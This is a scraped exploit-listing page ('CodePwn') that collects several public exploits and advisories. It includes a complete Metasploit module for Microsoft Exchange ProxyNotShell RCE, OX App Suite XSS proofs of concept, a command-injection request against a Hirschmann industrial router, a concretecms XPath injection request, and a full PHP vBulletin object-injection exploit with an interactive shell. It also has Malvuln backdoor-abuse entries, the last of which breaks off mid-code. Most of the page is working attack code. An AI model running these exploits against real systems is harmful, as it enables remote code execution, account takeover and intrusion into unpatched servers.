Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HTTP::Exchange include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Exchange ProxyNotShell RCE', 'Description' => %q{ This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019. These vulnerabilities were patched in November 2022. }, 'Author' => [ 'Orange Tsai', # Discovery of ProxyShell SSRF 'Spencer McIntyre', # Metasploit module 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis 'Piotr Bazydło', # Vulnerability analysis 'Rich Warren', # EEMS bypass via ProxyNotRelay 'Soroush Dalili' # EEMS bypass ], 'References' => [ [ 'CVE', '2022-41040' ], # ssrf [ 'CVE', '2022-41082' ], # rce [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] ], 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Platform' => ['windows'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], 'Privileged' => true, 'Targets' => [ [ 'Windows Dropper', { 'Platform' => 'windows', 'Arch' => [ARCH_X64, ARCH_X86], 'Type' => :windows_dropper } ], [ 'Windows Command', { 'Platform' => 'windows', 'Arch' => [ARCH_CMD], 'Type' => :windows_command } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'AKA' => ['ProxyNotShell'], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options([ OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) ]) register_advanced_options([ OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]]) ]) end def check @ssrf_email ||= Faker::Internet.email res = send_http('GET', '/mapi/nspi/') return CheckCode::Unknown if res.nil? return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' # actually run the powershell cmdlet and see if it works, this will fail if: # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) # * the exchange emergency mitigation service M1 rule is in place return CheckCode::Safe unless execute_powershell('Get-Mailbox') CheckCode::Vulnerable rescue Msf::Exploit::Failed => e CheckCode::Safe(e.to_s) end def ibm037(string) string.encode('IBM037').force_encoding('ASCII-8BIT') end def send_http(method, uri, opts = {}) opts[:authentication] = { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'preferred_auth' => 'NTLM' } if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}" opts[:headers] = { 'X-Up-Devcap-Post-Charset' => 'IBM037', # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 'User-Agent' => "UP #{datastore['UserAgent']}" } else uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}" end super(method, uri, opts) end def exploit # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not # work on Exchange Server 2016 if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) vprint_status("Detected Exchange version: #{version}") if version < Rex::Version.new('15.2') fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') end end @ssrf_email ||= Faker::Internet.email case target['Type'] when :windows_command vprint_status("Generated payload: #{payload.encoded}") execute_command(payload.encoded) when :windows_dropper execute_cmdstager({ linemax: 7_500 }) end end def execute_command(cmd, _opts = {}) xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root <ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"> <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start"> <ObjectDataProvider.MethodParameters> <System:String>cmd.exe</System:String> <System:String>/c #{cmd.encode(xml: :text)}</System:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary> XAML identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root <Obj N="V" RefId="14"> <TN RefId="1"> <T>System.ServiceProcess.ServiceController</T> <T>System.Object</T> </TN> <ToString>Object</ToString> <Props> <S N="Name">Type</S> <Obj N="TargetTypeForDeserialization"> <TN RefId="1"> <T>System.Exception</T> <T>System.Object</T> </TN> <MS> <BA N="SerializationData"> #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} </BA> </MS> </Obj> </Props> <S> <![CDATA[#{xaml}]]> </S> </Obj> IDENTITY execute_powershell('Get-Mailbox', args: [ { name: '-Identity', value: identity } ]) end end class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream include Msf::Util::DotNetDeserialization def self.generate from_values([ Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values( class_info: Types::General::ClassInfo.new( obj_id: 1, name: 'System.UnitySerializationHolder', member_names: %w[Data UnityType AssemblyName] ), member_type_info: Types::General::MemberTypeInfo.new( binary_type_enums: %i[String Primitive String], additional_infos: [ 8 ] ), member_values: [ Types::Record.from_value(Types::RecordValues::BinaryObjectString.new( obj_id: 2, string: 'System.Windows.Markup.XamlReader' )), 4, Types::Record.from_value(Types::RecordValues::BinaryObjectString.new( obj_id: 3, string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' )) ] ), Types::RecordValues::MessageEnd.new ]) end end </code></pre>

<pre><code>Product: OX App Suite Vendor: OX Software GmbH Internal reference: OXUIB-1654 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev16 Vendor notification: 2022-05-23 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-31469 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: The detection mechanism for "deep links" in E-Mail (e.g. pointing to OX Drive) allows to inject references to arbitrary fake applications. This can be used to request unexpected content, potentially including script code, when those links are used. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. PoC: <a class="deep-link-app" href="https://test/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/apps/themes/default/logo.png?cut=&id=123"> Solution: We improved deep-link validation to avoid malicious use. --- Internal reference: OXUIB-1678 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3 Vendor notification: 2022-05-30 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37307 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Certain content like E-Mail signatures are stored using the "snippets" mechanism. This mechanism contains a weakness that allows to inject seemingly benign HTML content, like XHTML CDATA constructs, that will be sanitized to malicious code. Once such code is in place it can be used for persistent access to the users account. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require access to the same OX App Suite instance or temporary access to the users account. PoC: <![CDATA[ <bo<script></script>dy>AA<img src onerror="alert('XSS')">BB</body> ]]> Solution: We improved the sanitizing algorithm to deal with disguised code. --- Internal reference: OXUIB-1731 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3 Vendor notification: 2022-06-22 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37308 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Plain-text mail that contains HTML code can be used to inject script code when printing E-Mail. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to make the victim print a malicious E-Mail. PoC: ... Content-Type: text/plain <img src onerror="alert('XSS')"> Solution: We removed plain-text specific code and use existing sanitization mechanisms for HTML content. --- Internal reference: OXUIB-1732 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4 Vendor notification: 2022-06-22 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37309 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Contacts that do not contain a name but only a e-mail address can be used to inject script code to the "contact picker" component, commonly used to select contacts as recipients or participants. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require access to the same OX App Suite instance or make the victim import malicious contact data. Solution: We now apply proper HTML escaping to all relevant data sets. --- Affected product: OX App Suite Internal reference: OXUIB-1785 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.6 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4 Vendor notification: 2022-07-20 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37310 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: The metrics and help modules use parts of the URL to determine capabilities. This mechanism suffers from a weakness that allows attackers to use special characters that register malicious capabilities, which will be executed as script code after login. Risk: Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink to its App Suite instance and login. While the "metrics" module is optional, the "help" module is available on all instances. PoC: https://appsuite.example.com/appsuite/#!!&app=io.ox/files&cap=t,(()%3d>{$$%3d%2bf;$f%3d%2b!f;$t%3d$f%2b!f;f$%3d$t|!f;t$%3df$%2b!f;$$f%3dt$|!f;$$t%3d$$f%2b!f;$f$%3d$$t|!f;$t$%3d(""%2b{})[$$f]%2b(""%2b{})[$f]%2b(""%2b[][f])[$f]%2b"f"[f$]%2b"t"[$$]%2b"t"[$f]%2b"t"[$t]%2b(""%2b{})[$$f]%2b"t"[$$]%2b(""%2b{})[$f]%2b"t"[$f];$$$%3d[][$t$][$t$];$$$("$$$('"%2b'\\'%2b$f%2bt$%2b$f%2b'\\'%2b$f%2b$$f%2bt$%2b'\\'%2b$f%2bt$%2b$$f%2b'\\'%2b$f%2b$$t%2b$t%2b'\\'%2b$f%2b$$t%2bt$%2b'('%2b'"'%2b'\\'%2b$f%2bf$%2b$$%2b'\\'%2b$f%2b$t%2bf$%2b'\\'%2b$f%2b$t%2bf$%2b'"'%2b')'%2b"')();")()})() Solution: We sanitized any non-parsable characters from the capabilities input. --- Internal reference: MWB-1712 Vulnerability type: Server-Side Request Forgery (CWE-918) Vulnerable version: 7.10.6 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.4 Vendor notification: 2022-07-14 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37313 CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Vulnerability Details: Deny-lists regarding external connections can be bypassed by using malicious DNS records with more than one A or AAAA response. Risk: Server-initiated requests to external resources (e.g. E-Mail accounts, data feeds) can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. PoC: Use API calls to setup an external mail account and provide a attacker controlled domain that returns more than one record. Only the first record will be checked against the deny-list, but the second record may also be used afterwards. Solution: We improved the analysis of DNS responses and check all available records against deny-list entries. --- Internal reference: MWB-1713 Vulnerability type: Uncontrolled Resource Consumption (CWE-400) Vulnerable version: 7.10.6 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3 Vendor notification: 2022-07-14 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37312 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) Vulnerability Details: The size of the request body for certain API endpoints were not sufficiently checked for plausible sizes. Risk: Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. Those requests do not require authentication. PoC: Sending a large request body containing a "redirect" URL to the "deferrer" servlet. Solution: We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage. --- Internal reference: MWB-1714 Vulnerability type: Uncontrolled Resource Consumption (CWE-400) Vulnerable version: 7.10.6 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3 Vendor notification: 2022-07-14 Solution date: 2022-08-10 Public disclosure: 2022-11-24 CVE reference: CVE-2022-37311 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) Vulnerability Details: The size of the request parameters for certain API endpoints were not sufficiently checked for plausible sizes. Risk: Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. Those requests do not require authentication. PoC: Sending a large "location" request parameter to the "redirect" servlet. Solution: We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage. </code></pre>

<pre><code>CyberDanube Security Research 20221124-0 ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Hirschmann (Belden) BAT-C2 vulnerable version| 8.8.1.0R8 fixed version| 09.13.01.00R04 CVE number| CVE-2022-40282 impact| High homepage| https://hirschmann.com/ | https://beldensolutions.com found| 2022-08-01 by| T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "The Technology and Market Leader in Industrial Networking. Hirschmann™ develops innovative solutions, which are geared towards its customers’ requirements in terms of performance, efficiency and investment reliability." Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml Vulnerable versions ------------------------------------------------------------------------------- Hirschmann BAT-C2 / 8.8.1.0R8 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The command "ping 192.168.1.1" was injected to the system by using the following POST request: =============================================================================== POST / HTTP/1.1 Host: 192.168.3.150 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 75 Origin: https://192.168.3.150 Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d" Referer: https://192.168.3.150/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/ =============================================================================== The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Upgrade to firmware version 09.13.01.00R04 or above. A security bulletin for this vulnerability has been published by the vendor: https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/ Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends customers from Hirschmann to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended. Contact Timeline ------------------------------------------------------------------------------- 2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact suspects a duplicate. Asked contact for more information. 2022-08-18: Belden representative sent more information for clarification. Highlighted differences between PoCs. 2022-08-22: Belden contact confirmed the vulnerability to be no duplicate. 2022-08-30: Asked for an update. 2022-08-31: Vendor stated, that he will release another security bulletin for this vulnerability. 2022-09-27: Asked for an update. 2022-09-28: Vendor is currently testing the new firmware version and has also been assigned with an CVE number. Draft of security bulletin was also sent by the security contact. 2022-10-12: Asked for an update. 2022-10-13: Belden contact stated, that there is no publication date for now as another patch must be integrated. 2022-10-28: Security contact informed us, that the patch will be released within the next two weeks. 2022-11-22: Asked for a status update; Security contact stated, that the release was delayed due internal reasons. 2022-11-23: Vendor sent the final version of the security bulletins. The release of the new firmware version will be 2022-11-28. 2022-11-24: Vendor informed CyberDanube that the release of the bulletin and the firmware was done on 2022-11-23 by the marketing team. Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF T. Weber / @2022 </code></pre>

<pre><code>## Title: concretecms-9.1.3 Xpath injection ## Author: nu11secur1ty ## Date: 11.28.2022 ## Vendor: https://www.concretecms.org/ ## Software: https://www.concretecms.org/download ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 ## Description: The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder `3`, and an XPath error message was returned. The attacker can flood with requests the system by using this vulnerability to untilted he receives the actual paths of the all content of this system which content is stored on some internal or external server. ## STATUS: HIGH Vulnerability [+] Exploits: 00: ```GET GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+] Response: ```HTTP HTTP/1.1 500 Internal Server Error Date: Mon, 28 Nov 2022 15:32:22 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 592153 <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>Concrete CMS has encountered an issue.</title> <style>body { font: 12px "Helvetica Neue", helvetica, arial, sans-serif; color: #131313; background: #eeeeee; padding:0; margin: 0; max-height: 100%; text-rendering: optimizeLegibility; } a { text-decoration: none; } .Whoops.container { position: relative; z-index: 9999999999; } .panel { overflow-y: scroll; height: 100%; position: fixed; margin: 0; left: 0; top: 0; } .branding { position: absolute; top: 10px; right: 20px; color: #777777; font-size: 10px; z-index: 100; } .branding a { color: #e95353; } header { color: white; box-sizing: border-box; background-color: #2a2a2a; padding: 35px 40px; max-height: 180px; overflow: hidden; transition: 0.5s; } header.header-expand { max-height: 1000px; } .exc-title { margin: 0; color: #bebebe; font-size: 14px; } .exc-title-primary, .exc-title-secondary { color: #e95353; } .exc-message { font-size: 20px; word-wrap: break-word; margin: 4px 0 0 0; color: white; } .exc-message span { display: block; } .exc-message-empty-notice { color: #a29d9d; font-weight: 300; } ....... ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3) ## Proof and Exploit: [href](https://streamable.com/4f60ka) ## Time spent `03:00:00` </code></pre>

<pre><code><?php /* -------------------------------------------------------------- vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability -------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. [-] Technical writeup: http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[+] cURL extension required!\n"); print "+------------------------------------------------------------------+"; print "\n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |"; print "\n+------------------------------------------------------------------+\n"; if ($argc != 4) { print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } class googlelogin_vendor_autoload {} // fake class to include the autoloader class GuzzleHttp_HandlerStack { private $handler, $stack; function __construct($cmd) { $this->stack = [["system"]]; // the callback we want to execute $this->handler = $cmd; // argument for the callback } } class GuzzleHttp_Psr7_FnStream { function __construct($callback) { $this->_fn_close = $callback; } } function make_popchain($cmd) { $pop = new GuzzleHttp_HandlerStack($cmd); $pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']); $chain = serialize([new googlelogin_vendor_autoload, $pop]); $chain = str_replace(['s:', chr(0)], ['S:', '\00'], $chain); $chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttp\HandlerStack', $chain); $chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttp\Psr7\FnStream', $chain); $chain = str_replace('0GuzzleHttp\HandlerStack', '0GuzzleHttp\5CHandlerStack', $chain); return $chain; } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "[+] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!\n"); print "[+] Logged-in! Retrieving security token\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!\n"); $params = ["routestring" => "ajax/api/vb4_private/movepm", "securitytoken" => $token[1], "folderid" => 1]; print "[+] Launching shell\n"; while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $params["messageids"] = make_popchain($cmd); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); } </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Backdoor.Win32.Autocrat.b Vulnerability: Weak Hardcoded Credentials Description: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password. Family: Autocrat Type: PE32 MD5: 4262a8b52b902aa2e6bf02a156d1b8d4 Vuln ID: MVID-2022-0660 Dropped files: srvsupp.exe Disclosure: 11/24/2022 Exploit/PoC: C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536 Login:autocrat WinShell v5.0 (C)2002 janker.org ? for help CMD>? i Install r Remove p Path b reBoot d shutDown s Shell x eXit q Quit Download: CMD>http://.../srv.exe ? for help CMD>s Microsoft Windows [Version 10.0.16299.309] (c) 2017 Microsoft Corporation. All rights reserved. C:\Users\Victim\Desktop>whoami whoami desktop-2c3iqho\victim C:\Users\Victim\Desktop>net user apparitionsec 666 /add net user apparitionsec 666 /add The command completed successfully. C:\Users\Victim\Desktop> Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Backup media: infosec.exchange/@malvuln Threat: Trojan.Win32.DarkNeuron.gen Vulnerability: Named Pipe Null DACL Family: DarkNeuron (Turla Group) Type: PE32 MD5: d891c9374ccb2a4cae2274170e8644d8 Vuln ID: MVID-2022-0661 Disclosure: 11/24/2022 Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group. \\.\Pipe\Winsock2\baseapi_http RW Everyone RW BUILTIN\Administrators Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications. Exploit/PoC: #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" /* Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exe MD5: d891c9374ccb2a4cae2274170e8644d8 NamedPipe Exploit Deny Access to Everyone By Malvuln Nov of 2022 **/ #define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http" int main(void){ HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL); PACL pOldDACL = NULL; PACL pNewDACL = NULL; if (hPipe == INVALID_HANDLE_VALUE){ printf("%d", GetLastError()); return 1; } if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; } TRUSTEE trustee[1]; trustee[0].TrusteeForm = 